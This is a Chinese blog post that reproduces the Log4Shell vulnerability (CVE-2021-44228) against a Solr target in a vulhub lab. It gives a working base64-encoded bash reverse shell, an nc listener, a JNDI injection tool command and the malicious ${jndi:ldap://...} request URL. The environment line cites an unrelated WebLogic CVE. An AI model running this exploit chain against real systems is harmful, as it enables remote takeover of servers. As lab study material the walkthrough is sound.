CVE-2021-44228 log4j漏洞复现

本文详细描述了如何在特定环境中复现CVE-2021-44228Log4j漏洞,包括使用工具如java-jar和nc监听端口,构造并执行payload,以及在WebLogic服务器上利用JNDI注入攻击的过程。
摘要由CSDN通过智能技术生成

【注意】本文只是记录漏洞复现的操作过程,以下仅供学习参考之目的,勿作他用,否则后果自负。

环境

靶机:ubuntu
攻击机:Kali-linux
漏洞搭建:\vulhub-master\weblogic\CVE-2023-21839

使用到的工具

  • 工具:

具体复现过程:

0、准备工作
  1. 进入攻击机kali,java -version 查看java 版本,由于工具需要低于1.8版本,而kali自带的版本过高,需切换到1.8版本,具体过程,可以参考这篇文章kali切换jdk版本,该作者写得非常清楚,此处不再赘述。
  2. 进入靶机ubuntu,进入vulhub-master\log4j\CVE-2021-44228,搭建漏洞环境,搭建成功后,在浏览器中输入:靶机IP:8983,页面如下:
    在这里插入图片描述
1、构造payload

反弹shell:bash -i >& /dev/tcp/192.168.68.150/2233 0>&1
解释:bash -i >& /dev/tcp/攻击机IP/攻击机监听端口[任意给哈] 0>&1
对payload进行base64编码:可以利用编码网站(推荐使用,更加便捷,更少出错😀),也可以通过编辑器手动编码(如果网站失效了,就手动吧😂),得到如下:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY4LjE1MC8yMjMzIDA+JjE}|{base64,-d}|{bash,-i}
解释:bash -c {echo,反弹shell的base64编码}|{base64,-d}|{bash,-i}

2、监听端口

打开一个cmd,输入 nc -lvvp 2233
解释:nc -lvvp 步骤1中构造payload时设置的端口
在这里插入图片描述

3、利用工具

另起一个cmd,利用工具:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY4LjE1MC8yMjMzIDA+JjE}|{base64,-d}|{bash,-i}" -A "192.168.68.150"
解释:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "步骤1中构造的payload" -A "攻击机IP"
在这里插入图片描述

4、得到工具生成的payload

注意图中框出部分,复制对应版本JDK的payload
在这里插入图片描述

5、浏览器访问

浏览器访问:192.168.68.130:8983/solr/admin/cores?action=${jndi:ldap://192.168.68.150:1389/4aazyj}
解释:靶机IP:1389/solr/admin/cores?action=${jndi:步骤3中得到的payload}
(两种payload都可以,分别对应的两种协议)
在这里插入图片描述
页面返回的结果如下:
在这里插入图片描述

6、返回CMD1查看

发现服务器已经接收到返回信息
在这里插入图片描述

7、返回CMD2查看

发现已经进入到docker中的服务器命令行界面
在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值